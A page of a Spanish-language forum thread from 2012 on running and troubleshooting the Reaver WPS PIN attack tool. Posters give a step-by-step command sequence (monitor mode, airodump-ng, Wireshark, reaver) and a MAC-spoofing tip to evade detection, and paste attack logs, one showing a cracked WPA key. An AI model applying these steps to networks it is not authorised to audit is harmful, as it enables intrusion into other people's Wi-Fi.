Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
26-09-2017, 05:33 (Martes)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Liberada wifislax64-1.1 version final para descargar

Videos Downloader




+  Seguridad Wireless - Wifi
|-+  Suite Seguridad Wireless
| |-+  Live CD wifiway (Moderadores: USUARIONUEVO, ωarcry)
| | |-+  Reaver - Uso y Solución de Problemas
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: 1 [2] 3 4 5 6 7 ... 10 Ir Abajo Imprimir
Autor Tema: Reaver - Uso y Solución de Problemas  (Leído 287216 veces)
pepetoni68
Visitante
« Respuesta #20 : 23-01-2012, 15:02 (Lunes) »

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC
# macchanger -m 00:11:22:33:44:55 mon0
creo que eso sobra ya que no se da soporte a la pirateria en esta web, y si es tu propia red da igual cambiar la MAC o no, ¿no crees?

por mucho menos se han cerrado temas y borrado posts por incumplir esa premisa, que hay que hacer las auditorias con red propias o con permiso del dueño, lo de cambiar la MAC no tiene ningun sentido entonces.

un saludo.
« Última modificación: 23-01-2012, 15:04 (Lunes) por pepetoni68 » En línea
Simanji
**
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« Respuesta #21 : 23-01-2012, 21:11 (Lunes) »

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC
# macchanger -m 00:11:22:33:44:55 mon0
creo que eso sobra ya que no se da soporte a la pirateria en esta web, y si es tu propia red da igual cambiar la MAC o no, ¿no crees?

por mucho menos se han cerrado temas y borrado posts por incumplir esa premisa, que hay que hacer las auditorias con red propias o con permiso del dueño, lo de cambiar la MAC no tiene ningun sentido entonces.

un saludo.

Hola Pepetoni! tu comentario tiene sentido pero no aplica para este post por los siguientes motivos

1) Aqui se esta llevando a cabo una discusion tecnica con la participacion de profesionales y entusiastas, no he visto el primer "puedo usar wyfiwey para tener internet gratizz alludenme plizzz".
 
2) No tenemos que decirnos mentiras, todos sabemos que las herramientas que discutimos pueden ser aprovechadas por manos constructivas como criminales, cada quien determina en que grupo esta.

3) El comando macchanger viene incluido con la suite, y de hecho airoscript lo usa todo el tiempo.  Si buscas en el foro tambien veras que en un par de posts se aconseja su uso.

Así que por favor dejemonos de vainas
« Última modificación: 24-01-2012, 04:51 (Martes) por Simanji » En línea
fer888
**
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« Respuesta #22 : 24-01-2012, 11:10 (Martes) »

yo llevo 12 horas puesto el reaver y solo tiene 0.36%.
es normal que tarde tanto?
En línea
chinitiw
*******
Desconectado Desconectado

Mensajes: 5521

][game 0ver][


Ver Perfil
« Respuesta #23 : 24-01-2012, 13:31 (Martes) »

yo llevo 12 horas puesto el reaver y solo tiene 0.36%.
es normal que tarde tanto?

Si depende del AP en cuestión .

Saludos
En línea
pepetoni68
Visitante
« Respuesta #24 : 24-01-2012, 19:27 (Martes) »

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC
# macchanger -m 00:11:22:33:44:55 mon0
creo que eso sobra ya que no se da soporte a la pirateria en esta web, y si es tu propia red da igual cambiar la MAC o no, ¿no crees?

por mucho menos se han cerrado temas y borrado posts por incumplir esa premisa, que hay que hacer las auditorias con red propias o con permiso del dueño, lo de cambiar la MAC no tiene ningun sentido entonces.

un saludo.

Hola Pepetoni! tu comentario tiene sentido pero no aplica para este post por los siguientes motivos

1) Aqui se esta llevando a cabo una discusion tecnica con la participacion de profesionales y entusiastas, no he visto el primer "puedo usar wyfiwey para tener internet gratizz alludenme plizzz".
 
2) No tenemos que decirnos mentiras, todos sabemos que las herramientas que discutimos pueden ser aprovechadas por manos constructivas como criminales, cada quien determina en que grupo esta.

3) El comando macchanger viene incluido con la suite, y de hecho airoscript lo usa todo el tiempo.  Si buscas en el foro tambien veras que en un par de posts se aconseja su uso.

Así que por favor dejemonos de vainas
dejate de vainas tu que yo no te he faltado al respecto lo primero de todo.

y lo segundo es que cambiar la MAC no tiene sentido ninguno salvo que uno quiera ocultar su identidad, lo cual implicaria estar intentando meterse en la red de otro, lo mires por donde lo mires no tienes ningun motivo ni para decir lo que has dicho de "que me deje de vainas" ni nada de lo que has puesto.
En línea
Simanji
**
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« Respuesta #25 : 24-01-2012, 19:42 (Martes) »

Hombre ¿en que momento te falté al respeto? "Dejemonos de vainas" no es ofensivo, confirma en Google si el término no se usa en tu país.

Te habia escrito que continuaramos la discusion en privado para no ensuciar el tema,
« Última modificación: 25-01-2012, 01:28 (Mi?rcoles) por sanson » En línea
sanson
Moderador Global
*
Desconectado Desconectado

Mensajes: 8375


Ver Perfil
« Respuesta #26 : 24-01-2012, 20:04 (Martes) »

hola


volvamos al tema si queréis deciros algo hacerlo por mp

saludos
En línea

warcry
Visitante
« Respuesta #27 : 24-01-2012, 21:43 (Martes) »

sin meterme mucho en la forma de expresión.

simanji, se estaba medio currando un manualillo de utilización del reaver, y lo del cambio de mac, obedece a dos factores

1º algún iluminado afirmaba que funcionaba cambiando la mac el reaver 1.4 que venia en ww3.4 antes de la modificación que ha hecho usuarionuevo (aunque no lo ha demostrado)

2º lo incluyo porque cogió de gorilla.maguila el método de utilizar wireshark para descubrir los ap,s vulnerables y este user recomendaba cambiar la mac ya que en algunos ap,s detectaban y grababan el ataque wps.

con esto espero zanjar el tema, que como os ha recomendado un moderador estabais sacando de contexto.
En línea
USUARIONUEVO
Moderador
*
Desconectado Desconectado

Mensajes: 13732



Ver Perfil
« Respuesta #28 : 25-01-2012, 00:58 (Mi?rcoles) »

el chipset RT3070 , ya funciona con normalidad en reaver 1.4 final.

para los que teniais uno por hay , y no lo podiais usar, ¿ok?.  Kiss
En línea

palutti
**
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« Respuesta #29 : 25-01-2012, 12:11 (Mi?rcoles) »

confirmo que el ataque WPS funciona en routers que tienen boton, al menos en el que yo tengo
cuando iba por el 2,05% salto de golpe a 90% en cuanto encontro las 4 primeras cifras

despues las 4 ultimas las encontro al 94%
total tardo 30 minutos

Ahora estoy probando con otro router con boton WPS. ha estado toda la noche y solo iba por el 52%
las pruebas de pins las acepta. si no fuera vulnerable devolveria error en cada pin? o se lo tragaria todo y llegaria a 100% sin resultado?

lo he parado y salvado el progreso con el "Salvar avance en XZM"
Ahora al querer continuar no encuentro donde esta la session file.
Alguien sabe donde lo guarda este modulo o como continuar un ataque salvado?
En línea
MovidasAfrikanas
**
Desconectado Desconectado

Mensajes: 9


Ver Perfil
« Respuesta #30 : 25-01-2012, 12:23 (Mi?rcoles) »

confirmo que el ataque WPS funciona en routers que tienen boton, al menos en el que yo tengo
cuando iba por el 2,05% salto de golpe a 90% en cuanto encontro las 4 primeras cifras

despues las 4 ultimas las encontro al 94%
total tardo 30 minutos

Ahora estoy probando con otro router con boton WPS. ha estado toda la noche y solo iba por el 52%
las pruebas de pins las acepta. si no fuera vulnerable devolveria error en cada pin? o se lo tragaria todo y llegaria a 100% sin resultado?

lo he parado y salvado el progreso con el "Salvar avance en XZM"
Ahora al querer continuar no encuentro donde esta la session file.
Alguien sabe donde lo guarda este modulo o como continuar un ataque salvado?
_________________________________________________________________
Buen Día palutti.
¿ Que versión de WW y reaver utilizas?

Si es desde WW3.4 y reaver 1.4, cuando salvas avance en XZM , lo deberia de crear en el escritorio.
Luego ese archivo lo haz de introducir en la carpeta de wifiway en base o modules.
Saludos.
« Última modificación: 25-01-2012, 13:04 (Mi?rcoles) por MovidasAfrikanas » En línea
USUARIONUEVO
Moderador
*
Desconectado Desconectado

Mensajes: 13732



Ver Perfil
« Respuesta #31 : 25-01-2012, 14:05 (Mi?rcoles) »

ya no se cuantos millones d eveces lo voy a repetir



CUANDO VOLVAIS A LANZAR EL MISMO ATAQUE AL MISMO OBJETIVO EL PROGRAMA INFORMARA DE QUE TIENE UNA SESION Y PEDIRA EMPEZAR DE CERO O CONTINUAR

HAY QUE PONER UNA FOTO PA ESO ??

En línea

MovidasAfrikanas
**
Desconectado Desconectado

Mensajes: 9


Ver Perfil
« Respuesta #32 : 25-01-2012, 15:25 (Mi?rcoles) »

ya no se cuantos millones d eveces lo voy a repetir



CUANDO VOLVAIS A LANZAR EL MISMO ATAQUE AL MISMO OBJETIVO EL PROGRAMA INFORMARA DE QUE TIENE UNA SESION Y PEDIRA EMPEZAR DE CERO O CONTINUAR

HAY QUE PONER UNA FOTO PA ESO ??
_________________________________________________________________

He aquí un novato en el asunto.

Vuelvo a pedir disculpas USUARIONUEVO lo había pasado por alto.
Lo tendré en cuenta para la proxima vez. Lips Sealed Embarrassed
En línea
Simanji
**
Desconectado Desconectado

Mensajes: 15


Ver Perfil
« Respuesta #33 : 25-01-2012, 17:34 (Mi?rcoles) »

El error es mio por no haberlo puesto en el manual! De hecho, ahora que lo pienso. es el unico manual en el que no aparece el producto funcionando   Embarrassed

Por aquí tengo muchos screenshots del paso a paso del ataque pero no los puse porque el resultado no fue exitoso, alguien tiene algunas fotos de un ataque exitoso en proceso?

En caso de que no, figuró poner los screens del paso a paso fallido
« Última modificación: 25-01-2012, 17:38 (Mi?rcoles) por Simanji » En línea
marcus90
**
Desconectado Desconectado

Mensajes: 6


Ver Perfil
« Respuesta #34 : 26-01-2012, 01:44 (Jueves) »

Yo he intentado dos ataques al router de mi hermano, un ONOXXXXXX y las dos veces se me ha quedado al 90.90% y de ahi no avanza.

Y bueno tengo dos orange uno es un thomson y el otro un sagem, los dos el walsh los reconoce pero no deja ni intentar el ataque.

Asi que a esperar version nueva para probar si funciona  Tongue
En línea
cavernn
**
Desconectado Desconectado

Mensajes: 8


Ver Perfil
« Respuesta #35 : 26-01-2012, 09:39 (Jueves) »

Este último mensaje si que me parece interesante, ya que este post va de eso, solución de problemas, ¿Alguien lo ha conseguido con un router de orange? y si es así ha hecho algo especial o simplemente el famoso comando.
En línea
ragtap
**
Desconectado Desconectado

Mensajes: 28


Ver Perfil
« Respuesta #36 : 28-01-2012, 15:25 (S?bado) »

Que pensais que puede ocurrir aqui?Huh

Estoy con WW3.4, el reaver que trae integrado y una atheros 5k


wifiway ~ # reaver -i mon0 -b A0:21:B7:XX:XX:XX -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from A0:21:B7::XX:XX:XX
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3
  • Switching mon0 to channel 4
  • Switching mon0 to channel 5
  • Switching mon0 to channel 6
  • [!] WARNING: Failed to associate with A0:21:B7::XX:XX:XX  (ESSID: ONOXXXX)
  • Associated with A0:21:B7::XX:XX:XX  (ESSID: ONOD55D)
  • Trying pin 12345670
  • [!] WARNING: Failed to associate with A0:21:B7::XX:XX:XX (ESSID: ONOXXXX)
  • Switching mon0 to channel 6
  • Sending EAPOL START request
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 84405678
  • Sending EAPOL START request
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 99765675
  • Sending EAPOL START request
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • Sending identity response
  • [!] WPS transaction failed, re-trying last pin
  • Trying pin 99765675
  • [!] WARNING: Failed to associate with A0:21:B7:XX:XX:XX (ESSID: ONOXXXX)
  • Switching mon0 to channel 7
  • [!] WARNING: Failed to associate with A0:21:B7:XX:XX:XX(ESSID: ONOXXXX)
  • Switching mon0 to channel 8
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
^C
En línea
Garcad
*******
Desconectado Desconectado

Mensajes: 925


Ver Perfil
« Respuesta #37 : 29-01-2012, 17:31 (Domingo) »

ragtap no te esta funcionando bien.

Cuando lo hace veras algo parecido a lo siguiente.

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:
# airmon-ng start wlan0

Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:
# airodump-ng mon0

Cuando se en el canal que emite, cierro la ventana y sigo con...

Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.



Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark  en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

Un vídeo que explica el proceso perfectamente.

http://www.youtube.com/watch?v=Vg_Wo_1eo5c

Salu2
« Última modificación: 29-01-2012, 17:44 (Domingo) por Garcad » En línea

El conocimiento por sí solo no genera valor. El valor sólo es creado cuando la sabiduría encauza y orienta los conocimientos. Daisaku Ikeda

Modulos WifiSlax 64Bits

Modulos Wifiway

Modulos 4.10.alfa1
ragtap
**
Desconectado Desconectado

Mensajes: 28


Ver Perfil
« Respuesta #38 : 29-01-2012, 19:50 (Domingo) »

Hola Garcad,

He estado haciendo cientos de pruebas y no consigo nada. Se puede instalar la versión 1.3 para hacer pruebas u otra versión mas moderna?

Que adaptador barato y bueno me recomendarías? Tengo un RT2500 con antena exterior pero parece que no funciona con  el reaver.

Muchas gracais!


En línea
Garcad
*******
Desconectado Desconectado

Mensajes: 925


Ver Perfil
« Respuesta #39 : 30-01-2012, 14:28 (Lunes) »

Se pueden usar la version 1.4 y 1.3 al mismo tiempo usando los binarios de estos.

Desde una Konsola

# walsh

para usar la aplicacion instalada

# ./walsh

para usar el archivo binario

No te recomiendo que te compres ningun adaptador para verificar si tu router es vulnerable.

El autor dice que estos son los drivers compatibles.

http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers

Yo tengo una rtl8187 y rt73usb  compatibles.

Salu2
« Última modificación: 30-01-2012, 15:33 (Lunes) por Garcad » En línea

El conocimiento por sí solo no genera valor. El valor sólo es creado cuando la sabiduría encauza y orienta los conocimientos. Daisaku Ikeda

Modulos WifiSlax 64Bits

Modulos Wifiway

Modulos 4.10.alfa1
Páginas: 1 [2] 3 4 5 6 7 ... 10 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios
Si continúa navegando consideramos que acepta su uso. OK Más información | Y más
Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines
SMFAds for Free Forums